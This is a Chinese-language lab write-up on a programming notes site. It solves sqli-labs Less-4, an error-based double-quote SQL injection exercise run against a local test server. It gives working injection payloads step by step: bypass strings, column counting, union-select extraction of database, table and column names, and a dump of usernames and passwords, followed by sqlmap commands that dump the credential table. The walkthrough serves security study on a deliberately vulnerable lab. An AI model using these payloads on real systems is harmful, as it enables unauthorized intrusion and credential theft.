热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

sqlilabs第四关基于错误的GET双引号字符型注入

手工union联合查询注入?YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserver

手工 union 联合查询注入

?id=1"

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

您的SQL语法有错误;请查看与MySQL服务器版本对应的手册,以了解第1行“1”)限制0,1附近使用的正确语法

# 代码查询语句可能是这个:
$sql="SELECT * FROM users WHERE id=(“$id”) LIMIT 0,1";

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

使用:
") or "1"=("1
") or 1=1 --+
可以进行绕过

 

 http://127.0.0.1/sqli-labs-master/Less-4/?id= ") or "1"=("1

 

 http://127.0.0.1/sqli-labs-master/Less-4/?id= ") or 1=1--+

 

 

# 首先要用order by 子句猜解查询的字段数(二分法)。 [猜解查询字段数的原因:使用联合查询时,副查询字段数需要与主查询字段数一致,否则会报错。]

?id=") or 1=1 order by 3 --+ 成功
?id=") or 1=1 order by 4 --+ 失败

则说明有3个字段:http://127.0.0.1/sqli-labs-master/Less-4/?id= ") or 1=1 order by 1--+

 

 http://127.0.0.1/sqli-labs-master/Less-4/?id= ") or 1=1 order by 5--+

 

 

# 通过联合查询(union)构造payload来获取数据库名 :
?id=500") union select 1,2,3 --+

?id=500") union select 1,2,database() --+
?id=500") union select 1,database(),3 --+
?id=500") union select database(),2,3 --+

# 注:
为什么是1100呢?因为前面查询为假后面才能正常查询.
利用报错注入,union是联合查询,意思是俩个select查询结果合并,我们把左边的设置为空集那么右边的select查询自然成了第一行,这就是union select。

 

 

# 构造payload 来获取数据表
?id=1000") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

# 注:
group_concat( [DISTINCT] 要连接的字段 [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] ) 将相同的行组合起来
group_concat(table_name)
information_schema:结构用来存储数据库系统信息
information_schema.tables
SCHEMA_NAME(schema_name) 表示数据库名称
TABLE_SCHEMA(table_schema) 表示表所属的数据库名称;
TABLE_NAME(table_name) 表示所属的表的名称
COLUMN_NAME(column_name) 表示字段名

 

 http://127.0.0.1/sqli-labs-master/Less-4/?id=1000") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 

 http://127.0.0.1/sqli-labs-master/Less-4/?id=1000") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

 

 

# 构造 payload 来获取字段名:
?id=1000") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

 

 

# 构造 payload 来获取用户名账号和密码:
?id=500") union select 1,2,group_concat(username,0x3a,password) from users--+

# 注:
0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ':' ,用以分割pasword和username。

 

 

SQLmap 自动测试:
检查一下注入点:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-4/?id=1" --batch

列出数据库信息:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-4/?id=1" --dbs --batch

 

 指定数据库名列出所有表:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-4/?id=1" -D security --tables --batch

 

 指定数据库名表名列出所有字段 (爆破字段)y:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-4/?id=1" -D security -T users --columns --batch

 

 指定数据库名表名字段dump出指定字段:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-4/?id=1" -D security -T users -C username,password --dump

 

学而不思则罔,思而不学则殆



推荐阅读
  • 概述本章主要写当慢查询文件很大的时候怎样在线生成一个新的慢查询文件。测试环境:mysql5.6.2 ... [详细]
  • 本文介绍了如何使用PHP代码将表格导出为UTF8格式的Excel文件。首先,需要连接到数据库并获取表格的列名。然后,设置文件名和文件指针,并将内容写入文件。最后,设置响应头部,将文件作为附件下载。 ... [详细]
  • 本文介绍了如何使用php限制数据库插入的条数并显示每次插入数据库之间的数据数目,以及避免重复提交的方法。同时还介绍了如何限制某一个数据库用户的并发连接数,以及设置数据库的连接数和连接超时时间的方法。最后提供了一些关于浏览器在线用户数和数据库连接数量比例的参考值。 ... [详细]
  • 如何使用Java获取服务器硬件信息和磁盘负载率
    本文介绍了使用Java编程语言获取服务器硬件信息和磁盘负载率的方法。首先在远程服务器上搭建一个支持服务端语言的HTTP服务,并获取服务器的磁盘信息,并将结果输出。然后在本地使用JS编写一个AJAX脚本,远程请求服务端的程序,得到结果并展示给用户。其中还介绍了如何提取硬盘序列号的方法。 ... [详细]
  • 解决VS写C#项目导入MySQL数据源报错“You have a usable connection already”问题的正确方法
    本文介绍了在VS写C#项目导入MySQL数据源时出现报错“You have a usable connection already”的问题,并给出了正确的解决方法。详细描述了问题的出现情况和报错信息,并提供了解决该问题的步骤和注意事项。 ... [详细]
  • 本文详细介绍了MySQL表分区的创建、增加和删除方法,包括查看分区数据量和全库数据量的方法。欢迎大家阅读并给予点评。 ... [详细]
  • 本文详细介绍了如何使用MySQL来显示SQL语句的执行时间,并通过MySQL Query Profiler获取CPU和内存使用量以及系统锁和表锁的时间。同时介绍了效能分析的三种方法:瓶颈分析、工作负载分析和基于比率的分析。 ... [详细]
  • 无详细内容MySQLmysqlmysqlDELIMITERmysqlCREATEFUNCTIONmyProc(costDECIMAL(10,2))-RETURNSDECIMAL(1 ... [详细]
  • http头_http头部注入
    1、http头部注入分析1、原理 ... [详细]
  • 本文详细介绍了SQL日志收缩的方法,包括截断日志和删除不需要的旧日志记录。通过备份日志和使用DBCC SHRINKFILE命令可以实现日志的收缩。同时,还介绍了截断日志的原理和注意事项,包括不能截断事务日志的活动部分和MinLSN的确定方法。通过本文的方法,可以有效减小逻辑日志的大小,提高数据库的性能。 ... [详细]
  • Java序列化对象传给PHP的方法及原理解析
    本文介绍了Java序列化对象传给PHP的方法及原理,包括Java对象传递的方式、序列化的方式、PHP中的序列化用法介绍、Java是否能反序列化PHP的数据、Java序列化的原理以及解决Java序列化中的问题。同时还解释了序列化的概念和作用,以及代码执行序列化所需要的权限。最后指出,序列化会将对象实例的所有字段都进行序列化,使得数据能够被表示为实例的序列化数据,但只有能够解释该格式的代码才能够确定数据的内容。 ... [详细]
  • Metasploit攻击渗透实践
    本文介绍了Metasploit攻击渗透实践的内容和要求,包括主动攻击、针对浏览器和客户端的攻击,以及成功应用辅助模块的实践过程。其中涉及使用Hydra在不知道密码的情况下攻击metsploit2靶机获取密码,以及攻击浏览器中的tomcat服务的具体步骤。同时还讲解了爆破密码的方法和设置攻击目标主机的相关参数。 ... [详细]
  • 如何在php中将mysql查询结果赋值给变量
    本文介绍了在php中将mysql查询结果赋值给变量的方法,包括从mysql表中查询count(学号)并赋值给一个变量,以及如何将sql中查询单条结果赋值给php页面的一个变量。同时还讨论了php调用mysql查询结果到变量的方法,并提供了示例代码。 ... [详细]
  • 解决IDEA配置xml文件头报错的方法
    本文介绍了解决IDEA配置xml文件头报错的方法,包括了具体的解决方案和步骤。通过本文的指导,读者可以轻松解决这个问题并正常使用IDEA进行开发工作。 ... [详细]
  • 目录浏览漏洞与目录遍历漏洞的危害及修复方法
    本文讨论了目录浏览漏洞与目录遍历漏洞的危害,包括网站结构暴露、隐秘文件访问等。同时介绍了检测方法,如使用漏洞扫描器和搜索关键词。最后提供了针对常见中间件的修复方式,包括关闭目录浏览功能。对于保护网站安全具有一定的参考价值。 ... [详细]
author-avatar
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有